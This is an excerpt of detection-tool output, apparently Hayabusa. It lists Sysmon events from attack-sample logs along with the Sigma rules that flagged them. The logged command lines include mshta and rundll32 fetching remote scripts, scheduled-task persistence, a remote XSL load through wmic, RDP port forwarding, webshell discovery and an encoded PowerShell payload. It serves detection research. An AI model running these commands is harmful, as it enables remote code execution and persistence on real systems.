Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive 